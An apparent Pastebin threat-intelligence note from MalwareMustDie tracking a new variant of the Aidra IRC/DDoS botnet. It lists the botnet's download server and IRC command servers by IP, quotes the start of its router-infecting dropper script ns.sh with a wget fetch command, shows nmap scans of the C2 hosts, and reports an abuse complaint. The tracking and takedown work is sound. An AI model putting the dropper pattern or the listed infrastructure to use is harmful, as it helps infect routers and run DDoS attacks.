SHARE
TWEET

Clone Paste - d3m0n3 Linux/IRCTelnet

MalwareMustDie Oct 29th, 2016 (edited) 303 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. New version of Aidra botnet coded by "d3m0n3".
  2. You can find him on IRCnet on #hack.it
  3.  
  4. This version has geolocation, coded in italian, ipv6 ddos, use wget and ftp for inject the code.
  5.  
  6. d3m0n3's dDoSnet:
  7. - webserver: http://213.251.186.169 (OVH)
  8. It works!
  9. This is the default web page for this server.
  10. The web server software is running but no content has been added, yet.
  11.  
  12. BUT BUT... the old getbinaries.sh is now named: ns.sh
  13. wget http://213.251.186.169/ns.sh | more ns.sh
  14. #!/bin/sh
  15. # THIS SCRIPT DOWNLOAD THE BINARIES INTO ROUTER.
  16. # UPLOAD GETBINARIES.SH IN YOUR HTTPD.
  17.  
  18. # YOUR HTTPD SERVER:
  19. REFERENCE_HTTP="http://213.251.186.169"
  20.  
  21. # NAME OF BINARIES:
  22. REFERENCE_MIPSEL="mmpl"
  23. REFERENCE_MIPS="mmps"
  24. REFERENCE_SUPERH="msph"
  25. REFERENCE_ARM="marm"
  26. REFERENCE_PPC="mppc"
  27. ...
  28.  
  29. BUT the ircd is not on the same server on OVH !!
  30. download an binary an emule it with qemu
  31. make an netstat and... look this:
  32. DESTINATION: 149.210.145.43 PORT: 7589 STATE: ESTABLISHED
  33. root@localhost:~$ nmap -sT -p7589 -sV 149.210.145.43
  34.  
  35. Starting Nmap 5.21 ( http://nmap.org ) at 2013-09-16 13:16 CEST
  36. Nmap scan report for 149-210-145-43.colo.transip.net (149.210.145.43)
  37. Host is up (0.13s latency).
  38. PORT     STATE SERVICE VERSION
  39. 7589/tcp open  irc     Unreal ircd
  40. Service Info: Host: irc.evils.in
  41.  
  42. Service detection performed. Please report any incorrect results at
  43. http://nmap.org/submit/ .
  44. Nmap done: 1 IP address (1 host up) scanned in 0.66 seconds
  45. root@localhost:~$
  46.  
  47. OOOOhh.. irc.evils.in like the realname of d3m0n3 on IRCnet:
  48. * [d3m0n3] (denial@2a01:270:2002:0:0:bc89:7ec1:ebc3): EvIL
  49.  
  50.  #####################################################
  51.  
  52. NEWS:
  53.  
  54. - Mailed the abuse of TransIP BV (149.210.145.43) the VPS
  55. are suspended at the moment!
  56.  
  57. - Another d3m0n3's ircd found with 20.000 aidra bot!
  58. root@localhost:~# nmap -sS -sV -PN 173.230.149.172
  59.  
  60. Starting Nmap 5.00 ( http://nmap.org ) at 2013-09-17 02:30 CEST
  61.  
  62. root@ksmini:~# nmap -sS -sV -PN -p7589 173.230.149.172
  63.  
  64. Starting Nmap 5.00 ( http://nmap.org ) at 2013-09-17 02:30 CEST
  65. Interesting ports on li159-172.members.linode.com (173.230.149.172):
  66. PORT     STATE SERVICE VERSION
  67. 7589/tcp open  irc     Unreal ircd
  68. Service Info: Host: irc2.evils.in
  69.  
  70. Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
  71. Nmap done: 1 IP address (1 host up) scanned in 0.88 seconds
  72. root@localhost:~#
RAW Paste Data
Top